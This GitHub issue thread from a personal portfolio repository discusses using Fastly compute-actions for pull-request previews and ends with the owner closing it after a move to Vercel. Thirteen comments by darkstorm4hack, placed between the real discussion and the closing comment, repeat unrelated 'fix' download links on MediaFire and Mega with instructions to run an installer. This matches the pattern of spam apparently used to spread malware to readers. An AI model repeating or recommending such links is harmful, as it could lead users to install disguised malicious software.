### ISSUE TITLE
Use `fastly/compute-actions/preview` for preview deployments in PRs

### ISSUE THREAD

**Issue by arunsathiya** [arunsathiya/portfolio#56]
https://www.fastly.com/documentation/guides/integrations/ci/

**Comment by sharunkumar** [comment]
This is overkill for a blog though, lol

**Comment by sharunkumar** [comment]
Besides we rarely update your blog content in PRs right? content update is automated?

**Comment by arunsathiya** [comment]
Good way to learn the concepts, haha. 

It's not built on a periodic basis, but when I update something on Notion, I trigger the Notion workflow manually.

**Comment by arunsathiya** [comment]
I actually want to show Spotify currently playing status with Fastly functions as middleware, so in those cases, previews can be helpful for PRs. I think [this is the relevant doc](https://www.fastly.com/documentation/guides/compute/javascript/#composing-requests-and-responses), but I am not too sure just yet. This is where I want to work out that logic though:

https://github.com/arunsathiya/portfolio/blob/5c81d861f43d28976ee1571c0830a56b63cc6fd9/compute-js/src/index.js#L13-L15

Also found this: [Preview on Fastly for each pull-request](https://github.com/fastly/compute-actions?tab=readme-ov-file#preview-on-fastly-for-each-pull-request).

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by arunsathiya** [comment]
No longer relevant with the move to Vercel for SSR/api support:

- https://github.com/arunsathiya/portfolio/pull/61
